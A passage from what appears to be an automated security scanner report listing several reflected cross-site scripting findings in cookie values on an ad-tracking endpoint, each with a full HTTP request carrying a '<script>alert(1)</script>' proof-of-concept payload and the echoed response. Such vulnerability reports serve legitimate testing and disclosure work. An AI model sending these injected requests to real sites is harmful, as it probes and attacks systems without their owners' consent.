The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 9cb96<script>alert(1)</script>8bdea76f6f2 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-13033490469cb96<script>alert(1)</script>8bdea76f6f2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:27 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206907; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
;
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-13033490469cb96<script>alert(1)</script>8bdea76f6f2', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p97174789": 'exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 1
...[SNIP]...
2.141. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9c95c<script>alert(1)</script>02d6ede0968 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&9c95c<script>alert(1)</script>02d6ede0968; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&9c95c<script>alert(1)</script>02d6ede0968', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...
2.142. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 144cd<script>alert(1)</script>4dc26a7e82d was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&144cd<script>alert(1)</script>4dc26a7e82d; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&144cd<script>alert(1)</script>4dc26a7e82d=&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&144cd<script>alert(1)</script>4dc26a7e82d', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...
2.143. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload ff2c8<script>alert(1)</script>9d7c9813128 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&ff2c8<script>alert(1)</script>9d7c9813128; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&ff2c8<script>alert(1)</script>9d7c9813128', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobu
...[SNIP]...
2.144. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 45b83<script>alert(1)</script>dbcb87bd638 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&45b83<script>alert(1)</script>dbcb87bd638; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&45b83<script>alert(1)</script>dbcb87bd638', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...
2.145. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 4cf27<script>alert(1)</script>a4d64bede87 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&4cf27<script>alert(1)</script>a4d64bede87; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:17 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206897; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&4cf27<script>alert(1)</script>a4d64bede87', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=
...[SNIP]...
2.146. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload c3519<script>alert(1)</script>d44fa25d073 was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

